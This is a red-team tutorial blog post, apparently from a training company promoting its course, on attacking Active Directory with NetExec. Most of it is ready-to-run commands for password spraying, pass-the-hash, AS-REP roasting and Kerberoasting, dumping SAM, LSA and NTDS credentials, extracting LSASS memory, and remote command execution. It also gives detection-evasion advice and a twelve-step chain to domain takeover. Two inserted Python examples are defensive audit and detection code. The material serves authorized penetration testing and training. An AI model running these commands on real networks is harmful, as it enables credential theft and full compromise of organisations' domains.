Date: April 6, 2026
Author: Karan Patel, CEO

Active Directory remains the backbone of enterprise identity management, and for red teamers it remains the most lucrative attack surface in any engagement. With CrackMapExec no longer under active development and the community rallying around its spiritual successor, NetExec (nxc) has become the go-to framework for offensive AD operations. This post walks through how red teamers can leverage NetExec from initial enumeration all the way through lateral movement and credential harvesting.

What Is NetExec and Why It Replaced CrackMapExec

NetExec is an open-source, actively maintained network exploitation tool built for pentesting Windows and Active Directory environments at scale. It supports multiple protocols including SMB, WinRM, LDAP, MSSQL, RDP, FTP, and SSH, making it a multi-vector offensive platform rather than just a pass-the-hash utility.

The project was forked from CrackMapExec after its development stalled, and the community has since added meaningful improvements: better module stability, updated Impacket dependencies, improved Kerberos support, and cleaner output formatting. If you are still running engagements with old CME builds, you are leaving capability on the table.

Install NetExec with:

pip install netexec

Or from source for the latest build:

git clone https://github.com/Pennyw0rth/NetExec
cd NetExec
pip install -e .

Verify the install:

nxc --version

SMB Enumeration: Building Your Target Picture

SMB is your first handshake with a Windows environment. NetExec makes it trivial to sweep an entire subnet and understand what you are dealing with before touching a single exploit.

Host Discovery and OS Fingerprinting

nxc smb 192.168.1.0/24

This single command returns hostnames, IP addresses, operating system versions, SMB signing status, and domain membership. The SMB signing column is particularly important: hosts with signing disabled are candidates for NTLM relay attacks.

Null Session and Anonymous Enumeration

Before you even have credentials, check for misconfigured shares and null session access:

nxc smb 192.168.1.10 -u '' -p '' --shares

nxc smb 192.168.1.10 -u 'guest' -p '' --shares

If anonymous authentication succeeds, enumerate users and groups via RPC:

nxc smb 192.168.1.10 -u '' -p '' --users
nxc smb 192.168.1.10 -u '' -p '' --groups

This kind of pre-credential enumeration is something a lot of junior practitioners skip. If you want to go deeper on structuring your AD recon phase properly, the Windows Red Teaming course at Redfox Cybersecurity Academy covers the full methodology from initial access through domain dominance.

Credential Validation and Password Spraying at Scale

Once you have a user list, whether from null sessions, OSINT, or a phishing payload, NetExec makes credential testing fast and protocol-flexible.

Validating a Single Credential Pair

nxc smb 192.168.1.0/24 -u 'jsmith' -p 'Password123!'

A green [+] indicates valid credentials. A (Pwn3d!) tag means you have local admin access on that host.

Password Spraying with Lockout Awareness

nxc smb 192.168.1.0/24 -u users.txt -p 'Winter2024!' --continue-on-success

Always use --continue-on-success during sprays so NetExec does not stop at the first hit. Pair this with LDAP to check the domain password policy before you spray:

nxc ldap 192.168.1.5 -u 'jsmith' -p 'Password123!' --pass-pol

This returns the lockout threshold, observation window, and minimum password age. Spraying without this information is how you cause an outage and get caught in the same move.

Hash-Based Authentication: Pass the Hash

When you have an NTLM hash from secretsdump, Mimikatz, or a captured relay, you do not need to crack it to use it:

nxc smb 192.168.1.0/24 -u 'Administrator' -H 'aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c'

This is a core lateral movement technique. NetExec will flag every host where that hash grants local admin, giving you your next pivot point instantly.

LDAP Enumeration: Pulling the Domain Apart

LDAP is where the real intelligence gathering happens. NetExec's LDAP module surfaces domain structure, user attributes, group memberships, and misconfigurations that would take hours to find manually.

Enumerating Domain Users and Attributes

nxc ldap 192.168.1.5 -u 'jsmith' -p 'Password123!' --users

To pull users with the DONT_REQ_PREAUTH flag set, which makes them vulnerable to AS-REP Roasting:

nxc ldap 192.168.1.5 -u 'jsmith' -p 'Password123!' --asreproast asrep_hashes.txt

Those hashes can then be cracked offline with Hashcat:

hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt

Kerberoasting via NetExec

Service accounts with SPNs registered are targets for Kerberoasting. NetExec can request and dump the TGS tickets in one command:

nxc ldap 192.168.1.5 -u 'jsmith' -p 'Password123!' --kerberoasting kerb_hashes.txt

Crack with Hashcat using mode 13100 for RC4-encrypted tickets:

hashcat -m 13100 kerb_hashes.txt /usr/share/wordlists/rockyou.txt --force
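
Both checks above key on the same two directory attributes: the DONT_REQ_PREAUTH bit in userAccountControl (AS-REP roasting) and a populated servicePrincipalName (Kerberoasting). As an added illustration, not code from the original post or from the NetExec project, the following Python decodes the userAccountControl bits and, over a constructed sample of directory objects, lists the enabled accounts a defender would remediate; the flag values are the documented AD schema values, the record layout is a simplified assumption.

```python
# userAccountControl bit values from the Active Directory schema (subset).
UAC_FLAGS = {
    "ACCOUNTDISABLE": 0x0002,
    "PASSWD_NOTREQD": 0x0020,
    "NORMAL_ACCOUNT": 0x0200,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "TRUSTED_FOR_DELEGATION": 0x80000,
    "DONT_REQ_PREAUTH": 0x400000,
}


def decode_uac(value):
    """Names of the known flags set in a userAccountControl integer."""
    return [name for name, bit in UAC_FLAGS.items() if value & bit]


def audit_roastable(users):
    """Enabled accounts that expose offline-crackable Kerberos material:
    'asrep'      - pre-authentication disabled (what --asreproast harvests)
    'kerberoast' - user accounts carrying an SPN (what --kerberoasting harvests)
    Disabled accounts are skipped: they cannot log on even if the password is recovered."""
    findings = {"asrep": [], "kerberoast": []}
    for u in users:
        flags = decode_uac(u["userAccountControl"])
        if "ACCOUNTDISABLE" in flags:
            continue
        if "DONT_REQ_PREAUTH" in flags:
            findings["asrep"].append(u["sAMAccountName"])
        if u.get("servicePrincipalName"):
            findings["kerberoast"].append(u["sAMAccountName"])
    return findings


# Constructed sample directory data (not from a real domain); hostnames are placeholders.
SAMPLE_USERS = [
    {"sAMAccountName": "jsmith", "userAccountControl": 0x200, "servicePrincipalName": []},
    {"sAMAccountName": "legacyapp", "userAccountControl": 0x200 | 0x400000, "servicePrincipalName": []},
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x200 | 0x10000,
     "servicePrincipalName": ["MSSQLSvc/sql01.domain.local:1433"]},
    {"sAMAccountName": "svc_old", "userAccountControl": 0x200 | 0x2 | 0x400000,
     "servicePrincipalName": ["HTTP/oldweb.domain.local"]},
]

if __name__ == "__main__":
    for category, accounts in audit_roastable(SAMPLE_USERS).items():
        print(f"{category}: {accounts}")
```

Remediation follows directly from the output: re-enable pre-authentication on the 'asrep' accounts, and give SPN-bearing user accounts long random passwords or move them to managed service accounts.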

Understanding why these attacks work requires knowing how Kerberos authentication is structured. The Windows Red Teaming course at Redfox Cybersecurity Academy breaks down Kerberos delegation, ticket structure, and attack chains in a way that makes the tooling make sense rather than just cargo-culting commands.

Bloodhound Data Collection via LDAP

NetExec has a built-in BloodHound collection module that pulls AD object relationships and formats them for BloodHound ingestion:

nxc ldap 192.168.1.5 -u 'jsmith' -p 'Password123!' --bloodhound --collection All

This generates ZIP files you can drag directly into the BloodHound interface to visualize attack paths to Domain Admin.

Finding LAPS Passwords

Local Administrator Password Solution stores randomized local admin passwords in AD. If your current user has read access to those attributes, NetExec can retrieve them:

nxc ldap 192.168.1.5 -u 'jsmith' -p 'Password123!' --laps

Each LAPS password returned is an immediate local admin credential for the corresponding machine. This is a high-value find in almost every enterprise environment.

SMB Modules: Credential Dumping and Post-Exploitation

NetExec's module system extends its capabilities far beyond authentication testing. The following are modules every red teamer should have in their standard workflow.

Dumping SAM, LSA, and NTDS

With local admin on a Windows target, you can dump credential material directly:

nxc smb 192.168.1.20 -u 'Administrator' -p 'Password123!' --sam

nxc smb 192.168.1.20 -u 'Administrator' -p 'Password123!' --lsa

For domain controllers, dump NTDS to get every domain account hash:

nxc smb 192.168.1.5 -u 'Administrator' -p 'Password123!' --ntds

The NTDS dump is the crown jewel of any AD engagement. With every domain hash in hand, you can authenticate as any account in the environment, perform pass-the-hash across the board, or crack high-value accounts offline.

Running Commands via SMB and WinRM

When you have admin credentials, you can execute commands directly on remote hosts without touching RDP:

nxc smb 192.168.1.20 -u 'Administrator' -p 'Password123!' -x 'whoami /all'

For PowerShell execution:

nxc smb 192.168.1.20 -u 'Administrator' -p 'Password123!' -X 'Get-LocalGroupMember Administrators'

WinRM offers a more stable command execution channel on hosts where it is enabled:

nxc winrm 192.168.1.20 -u 'Administrator' -p 'Password123!' -X 'systeminfo'

The Lsassy Module for In-Memory Credential Extraction

The lsassy module uses remote process dumping techniques to extract credentials from LSASS memory without dropping Mimikatz on disk:

nxc smb 192.168.1.20 -u 'Administrator' -p 'Password123!' -M lsassy

This is significantly more OPSEC-friendly than traditional LSASS dumping. Lsassy supports multiple dump methods and can target specific processes to avoid AV triggers.

Enumerating Logged-On Users and Sessions

Understanding who is logged on to which machine is critical for targeting. Hunting for a DA session gives you a path to credential theft without touching the DC directly:

nxc smb 192.168.1.0/24 -u 'jsmith' -p 'Password123!' --loggedon-users

nxc smb 192.168.1.0/24 -u 'jsmith' -p 'Password123!' --sessions

MSSQL Lateral Movement with NetExec

SQL Server instances in enterprise environments are frequently over-privileged and directly linked to lateral movement opportunities that SMB-focused operators miss entirely.

Authenticating to MSSQL Instances

nxc mssql 192.168.1.30 -u 'sa' -p 'Password123!'

Executing OS Commands via xp_cmdshell

If xp_cmdshell is enabled or you have sysadmin privileges to enable it:

nxc mssql 192.168.1.30 -u 'sa' -p 'Password123!' -x 'whoami'

NetExec handles enabling xp_cmdshell automatically when it detects sufficient privileges. This converts a SQL authentication into full OS-level command execution, which is a pivot technique that bypasses many network segmentation controls because SQL traffic is often whitelisted between application and database tiers.

MSSQL Linked Server Abuse

Many environments chain SQL servers together via linked server configurations. NetExec can enumerate these:

nxc mssql 192.168.1.30 -u 'sa' -p 'Password123!' -M mssql_priv

Linked servers often cross trust boundaries, allowing you to hop from a low-privilege SQL instance to a privileged one in a different network segment.

Kerberos Authentication with NetExec

For environments where NTLM is restricted or you want to avoid leaving NTLM authentication events in logs, NetExec supports full Kerberos authentication.

Using a TGT Cache File

After obtaining a TGT with tools like getTGT.py from Impacket:

python3 getTGT.py domain.local/jsmith:Password123!
export KRB5CCNAME=jsmith.ccache
nxc smb 192.168.1.5 -u 'jsmith' -p '' -k --use-kcache

Authenticating with a Kerberos Ticket

nxc smb 192.168.1.5 --kerberos -u 'jsmith' -p 'Password123!' -d 'domain.local'

Operating via Kerberos is an important OPSEC consideration on mature engagements. NTLM authentication generates specific Event IDs that blue teams monitor closely. Kerberos-based lateral movement blends into normal domain traffic more effectively.
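
To show what the blue team sees on the other side of the password spray and pass-the-hash steps described earlier, here is an added example (not from the original post or the NetExec project) in Python: it flags one source address producing 4625 failures across many accounts in a short window, and one account producing 4624 NTLM network logons on many hosts in a short window. The event records are constructed, and the field layout is a simplified assumption rather than the exact Windows event schema.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def ev(eid, t, user, host, src, pkg="NTLM", ltype=3):
    """One constructed Security-log-style record (simplified 4624/4625 fields)."""
    return {"id": eid, "time": datetime.fromisoformat(t), "user": user,
            "host": host, "src": src, "pkg": pkg, "type": ltype}


# Constructed sample (not real logs): a spray from 10.0.0.50 hitting six accounts within
# seconds, jsmith then logging on over NTLM to five hosts in a minute, plus benign noise.
EVENTS = [ev(4625, f"2026-04-06T09:00:{i:02d}", u, "DC01", "10.0.0.50")
          for i, u in enumerate(["jsmith", "bjones", "akhan", "mlee", "rgarcia", "tnguyen"])]
EVENTS += [ev(4624, f"2026-04-06T09:05:{i:02d}", "jsmith", h, "10.0.0.50")
           for i, h in enumerate(["FS01", "FS02", "WEB01", "SQL01", "WS-017"])]
EVENTS += [ev(4625, "2026-04-06T09:10:00", "bjones", "WS-003", "10.0.1.7"),
           ev(4624, "2026-04-06T09:11:00", "bjones", "WS-003", "10.0.1.7", "Kerberos", 2)]


def _bursts(events, keep, group_by, count, window):
    """Keep events passing `keep`, group them by `group_by`, and for each group return
    the largest set of distinct `count` values seen inside any window-long span."""
    groups = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        if keep(e):
            groups[e[group_by]].append(e)
    result = {}
    for g, evs in groups.items():
        best = set()
        for i, first in enumerate(evs):
            seen = {r[count] for r in evs[i:] if r["time"] - first["time"] <= window}
            best = max(best, seen, key=len)
        result[g] = best
    return result


def spray_sources(events, min_users=5, window=timedelta(minutes=10)):
    """Source addresses whose failed logons (4625) span >= min_users accounts in one window."""
    bursts = _bursts(events, lambda e: e["id"] == 4625, "src", "user", window)
    return {src: sorted(u) for src, u in bursts.items() if len(u) >= min_users}


def ntlm_fanout(events, min_hosts=4, window=timedelta(minutes=10)):
    """Accounts with successful NTLM network logons (4624, type 3) on >= min_hosts hosts in one window."""
    bursts = _bursts(events, lambda e: e["id"] == 4624 and e["type"] == 3 and e["pkg"] == "NTLM",
                     "user", "host", window)
    return {user: sorted(h) for user, h in bursts.items() if len(h) >= min_hosts}
```

The thresholds are illustrative; in practice they are tuned against the environment's baseline so that help-desk resets and service accounts do not trip them.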

If your goal is to operate like a real threat actor rather than just run tools, understanding the detection landscape alongside the offensive techniques is covered thoroughly in the Windows Red Teaming course at Redfox Cybersecurity Academy.

OPSEC Considerations When Using NetExec

NetExec is loud by default. Every failed authentication attempt, share enumeration, and remote command execution generates Windows event logs, network metadata, and potentially EDR alerts. Here are practices that reduce your footprint.

  • Target selectively. Sweeping entire subnets with authentication attempts is a fast path to detection. Use passive discovery first (responder, LLMNR poisoning, packet capture) to build a targeted host list before you authenticate against anything.
  • Control concurrency. NetExec defaults to multiple threads. Use --threads 1 during sensitive phases to slow your authentication rate and avoid triggering authentication flood detections.
  • Use local admin hashes, not domain admin. Authenticating everywhere as Domain Admin is a massive alert trigger. Use local admin credentials for lateral movement and only elevate to domain credentials when necessary.
  • Prefer WinRM over SMB for command execution. WinRM-based execution generates different and sometimes less scrutinized log entries depending on the target's SIEM configuration.

  • Clean up. If you use the --sam or --ntds modules, the VSS shadow copy created during dumping should be noted in your report and cleaned up during remediation guidance.

Chaining NetExec Into a Full Attack Path

A realistic engagement flow might look like this:

  1. Discover live hosts and SMB signing status via an unauthenticated sweep.
  2. Identify null session access or guest authentication on shares.
  3. Extract a user list from RPC or LDAP.
  4. Check domain password policy via LDAP.
  5. Spray one password against the user list.
  6. Use valid credentials to run BloodHound collection.
  7. Identify kerberoastable accounts and AS-REP roastable users.
  8. Crack hashes offline and authenticate with the recovered credentials.
  9. Enumerate logged-on users across all hosts to find privileged sessions.
  10. Use lsassy on the target host to extract in-memory credentials.
  11. Pass the hash for the recovered account across all hosts.
  12. Dump NTDS on the DC when you reach Domain Admin.

Each of these steps maps directly to a NetExec command or module. The tool is not just a credential validator; it is a complete operational framework for AD engagements.

Key Takeaways

NetExec has firmly established itself as the professional standard for Active Directory offensive tooling. Its protocol breadth, module system, and active community development make it the right choice for red teamers who need reliable, repeatable results across varied enterprise environments.

The difference between operators who use NetExec effectively and those who do not is not familiarity with the syntax; it is understanding the underlying protocols, authentication mechanisms, and AD trust relationships that make each technique work. Tools are only as effective as the knowledge behind them.

Redfox Cybersecurity Academy's Windows Red Teaming course is built for practitioners who want that depth. It covers Active Directory attack chains, lateral movement techniques, privilege escalation, and detection evasion in a structured, hands-on format designed for real-world engagement readiness.